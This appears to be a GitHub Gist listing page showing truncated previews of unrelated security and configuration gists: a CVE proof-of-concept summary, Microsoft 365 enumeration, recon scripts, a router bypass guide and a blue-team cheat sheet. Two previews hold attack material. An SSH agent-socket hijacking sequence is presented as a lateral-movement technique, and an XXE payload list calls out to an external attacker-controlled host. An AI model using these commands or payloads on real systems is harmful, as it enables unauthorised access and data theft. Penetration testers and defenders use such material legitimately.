Vulnerability Summary: Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Swing). Supported versions that are affected are Oracle Java SE: 8u361, 8u361-perf, 11.0.18, 17.0.6, 20; Oracle GraalVM Enterprise Edition: 20.3.9, 21.3.5 and 22.3.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specifie
win3zz
/ CVE-2023-21939.md
Created
August 27, 2023 12:33
CVE-2023-21939 - Code Exec - Proof of Concept
nullenc0de
/ 365doms.py
Created
February 23, 2023 01:37
modified from https://github.com/expl0itabl3/check_mdi
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| """ | |
| Python script to enumerate valid Microsoft 365 domains, retrieve tenant name, and check for an MDI instance. | |
| Based on: https://github.com/thalpius/Microsoft-Defender-for-Identity-Check-Instance. | |
| Usage: ./check_mdi.py -d <domain> | |
| """ | |
| import argparse | |
| import dns.resolver |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import plotly.express as px | |
| import pandas as pd | |
| import re | |
| filename = 'Gar.sub' | |
| points = [(0, 0)] | |
| t = 0 | |
| with open(filename, 'r') as f: | |
| for line in f: |
Untrusted-Game
/ untrusted-lvl1-solution.js
Created
June 24, 2021 14:28
Solution to level 1 in Untrusted: http://alex.nisnevich.com/untrusted/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /***************** | |
| * cellBlockA.js * | |
| ***************** | |
| * | |
| * Good morning, Dr. Eval. | |
| * | |
| * It wasn't easy, but I've managed to get your computer down | |
| * to you. This system might be unfamiliar, but the underlying | |
| * code is still JavaScript. Just like we predicted. | |
| * |
int0x80
/ SSH Agent Forwarding.md
Created
January 7, 2021 00:59
Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.
root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460
root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh user@internal.company.tld
user@internal:~$ hostname -f
internal.company.tld
honoki
/ xxe-payloads.txt
Last active
March 27, 2024 18:49
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y |
physhster
/ USG WPA Supplicant Config for AT&T Fiber
Last active
April 15, 2024 23:21
Complete-ish guide to WPA Supplicant bypass on AT&T U-verse Fiber with Unifi USG
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| *Important note to pay attention to* | |
| You'll most likely use eth0 on a USG and eth2 or eth3 on a USG-Pro, edit the files accordingly. Do not run the supplicant on virtual interfaces (e.g. eth0.0), as it will not work. | |
| *Pre-requisites* | |
| Get certs, run the mfg_dat_decode tool. You should end up with 3 certs: CA_*.pem, Client_*.pem and PrivateKey_PKCS1_*.pem, as well as a a wpa_supplicant.conf file | |
| In the archive generated by the tool, edit wpa_supplicant.conf to add the full path /config/auth/ to all 3 files: | |
| network={ | |
| ca_cert="/config/auth/CA_xxxxxx.pem" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Enable Powerlevel10k instant prompt. Should stay close to the top of ~/.zshrc. | |
| # Initialization code that may require console input (password prompts, [y/n] | |
| # confirmations, etc.) must go above this block; everything else may go below. | |
| if [[ -r "${XDG_CACHE_HOME:-$HOME/.cache}/p10k-instant-prompt-${(%):-%n}.zsh" ]]; then | |
| source "${XDG_CACHE_HOME:-$HOME/.cache}/p10k-instant-prompt-${(%):-%n}.zsh" | |
| fi | |
| # If you come from bash you might have to change your $PATH. | |
| # export PATH=$HOME/bin:/usr/local/bin:$PATH |
dwisiswant0
/ st8out.sh
Last active
February 17, 2024 16:48
St8out - Extra one-liner for reconnaissance
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| ##### | |
| # | |
| # St8out - Extra one-liner for reconnaissance | |
| # | |
| # Usage: ./st8out.sh target.com | |
| # | |
| # Resources: | |
| # - https://github.com/j3ssie/metabigor |
SwitHak
/ 20200114-TLP-WHITE_CVE-2020-0601.md
Last active
February 9, 2024 14:42
BlueTeam CheatSheet * CVE-2020-0601 * crypt32.dll | Last updated: 2020-01-21 1817 UTC
- Microsoft disclosed a vulnerability in their monthly Patch Tuesday referenced under CVE-2020-0601.
- The vulnerability was discovered by the U.S. National Security Agency, anounced today (2020-01-14) in their press conference, followed by a blog post and an official security advisory.
- The flaw is located in the "CRYPT32.DLL" file under the C:\Windows\System32\ directory.
- NSA description:
- NSA has discovered a critical vulnerability (CVE-2020-0601) affecting Microsoft Windows® cryptographic functionality.
NewerOlder